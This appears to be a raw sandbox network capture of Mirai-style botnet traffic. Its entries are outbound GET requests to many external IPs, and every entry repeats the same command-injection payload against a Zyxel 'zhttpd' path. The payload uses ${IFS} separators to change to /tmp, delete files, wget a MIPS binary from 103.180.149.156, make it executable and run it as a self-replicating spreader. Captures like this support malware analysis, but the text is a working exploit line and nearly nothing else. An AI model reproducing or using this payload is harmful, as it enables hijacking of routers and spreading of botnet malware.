                                                      Feb 2, 2024 06:36:01.814826965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6462192.168.2.1437154197.120.160.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.814888954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6463192.168.2.1436176223.131.231.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.814913034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6464192.168.2.143953493.35.119.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.814961910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6465192.168.2.145288440.54.174.124443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.814996958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6466192.168.2.14535522.15.51.215443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.815035105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6467192.168.2.143525254.244.198.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.815063953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6468192.168.2.144247454.139.109.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.815093040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6469192.168.2.145781424.159.224.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.815141916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6470192.168.2.143823281.0.77.69443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.815205097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6471192.168.2.144575482.111.13.124443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.815238953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6472192.168.2.143976612.96.146.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.815274000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6473192.168.2.14518249.50.78.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.815306902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6474192.168.2.1450976152.189.190.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.815354109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6475192.168.2.144152894.226.52.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.815395117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6476192.168.2.145307269.0.199.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.815442085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6477192.168.2.1435836121.146.182.147443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.815485001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6478192.168.2.144392493.253.80.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.815521002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6479192.168.2.1440734101.65.120.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.815563917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6480192.168.2.1447218216.127.52.35443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.815578938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6481192.168.2.1441988123.216.213.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.815634966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6482192.168.2.143671482.35.60.91443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.815670967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6483192.168.2.1453976157.249.150.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.815725088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6484192.168.2.1446568106.242.11.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.815769911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6485192.168.2.1459052208.145.136.255443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.815778017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6486192.168.2.1459016205.49.203.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.815809965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6487192.168.2.1454380125.211.105.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.815833092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6488192.168.2.146096470.141.251.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.815887928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6489192.168.2.145891297.179.21.54443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.815922022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6490192.168.2.145329098.15.124.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.815944910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6491192.168.2.1454922103.158.30.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.816004992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6492192.168.2.1452180174.76.227.228443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.816032887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6493192.168.2.145982478.53.228.54443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.816093922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6494192.168.2.144135693.192.252.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.816128969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6495192.168.2.144022034.54.159.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.816184998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6496192.168.2.1446934202.252.69.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.816194057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6497192.168.2.145026652.131.192.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.816227913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6498192.168.2.1447476142.222.126.91443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.816277027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6499192.168.2.1443880160.91.151.255443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.816327095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6500192.168.2.1458358179.190.241.168443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.816355944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6501192.168.2.1459002167.85.20.57443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.816406012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6502192.168.2.1450498112.154.156.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.816450119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6503192.168.2.1440512135.175.219.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.816490889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6504192.168.2.1457442186.242.156.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.816525936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6505192.168.2.14572222.211.229.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.816574097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6506192.168.2.1458076138.113.22.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.816632986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6507192.168.2.144873074.184.79.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.816664934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6508192.168.2.1448946118.116.232.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.816716909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6509192.168.2.1458340107.43.110.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.816749096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6510192.168.2.143520454.193.156.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.816765070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6511192.168.2.145661496.160.99.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.816793919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6512192.168.2.14394402.6.102.12443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.816827059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6513192.168.2.143536064.60.230.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.816881895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6514192.168.2.1438010163.188.143.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.816925049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6515192.168.2.1445632186.254.133.154443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.816970110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6516192.168.2.1452478122.207.206.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.816996098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6517192.168.2.1454374109.28.23.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.817051888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6518192.168.2.1446964220.74.168.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.817091942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6519192.168.2.1445476174.2.181.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.817152023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6520192.168.2.1441698109.118.247.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.817184925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6521192.168.2.1458712182.117.44.9443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.817228079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6522192.168.2.145709671.114.69.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.817281008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6523192.168.2.143566841.187.42.35443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:01.817303896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6524192.168.2.145945889.8.175.88443
                                                      TimestampBytes transferredDirectionData
